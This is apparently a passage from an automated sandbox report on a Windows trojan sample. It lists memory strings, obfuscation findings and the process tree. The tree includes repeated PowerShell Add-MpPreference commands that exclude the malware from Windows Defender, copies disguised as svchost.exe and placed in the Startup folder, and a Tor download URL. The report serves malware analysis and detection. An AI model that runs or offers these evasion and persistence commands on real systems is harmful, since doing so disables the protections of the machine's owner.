                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exeString found in binary or memory: https://mhconsultores.net.ve/
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.308834752.0000021F0B445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: powershell.exeProcess created: 46

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: VknMvPoCXZ.exe, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 481F404B.exe.1.dr, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: svchost.exe.1.dr, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.2.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.13.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.15.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.1.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 24.0.481F404B.exe.a50000.0.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_002A55BB
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_002A098B
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_024CC1F0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_0057098B
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_005755BB
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_011E98B0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_07056928
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_0705C819
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_07057090
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: VknMvPoCXZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\Shell\4B6A7152Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualStudio.DevOps.Telemetry.dllP vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevxrSmzjNKOKDOsAsVgFGKyJwRVHn.exe4 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exeStatic PE information: invalid certificate
                      Source: VknMvPoCXZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@113/58@0/2
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: VknMvPoCXZ.exeVirustotal: Detection: 47%
                      Source: VknMvPoCXZ.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile read: C:\Users\user\Desktop\VknMvPoCXZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\VknMvPoCXZ.exe 'C:\Users\user\Desktop\VknMvPoCXZ.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: unknownProcess created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                      Source: unknownProcess created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /SpecialRun 4101d8 6644
                      Source: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /SpecialRun 4101d8 6512
                      Source: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /SpecialRun 4101d8 6820
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
